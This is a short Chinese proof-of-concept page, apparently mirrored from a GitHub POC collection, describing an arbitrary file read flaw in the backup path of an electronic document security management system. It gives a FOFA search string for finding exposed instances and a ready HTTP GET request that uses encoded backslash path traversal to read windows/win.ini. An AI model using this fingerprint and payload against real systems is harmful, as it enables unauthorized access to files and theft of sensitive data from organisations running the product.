admin/POC

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 19:16:12 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

856 B

Raw Blame History

电子文档安全管理系统backup存在任意文件读取漏洞

一、漏洞简介

电子文档安全管理系统backup存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。

二、影响版本

电子文档安全管理系统

三、资产测绘

fofabody="docsafe/docsafe.nocache.js"
特征

四、漏洞复现

GET /resources/backup/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host:

更新: 2024-04-20 22:27:26
原文: https://www.yuque.com/xiaokp7/ocvun2/ef5aearlcpog05ob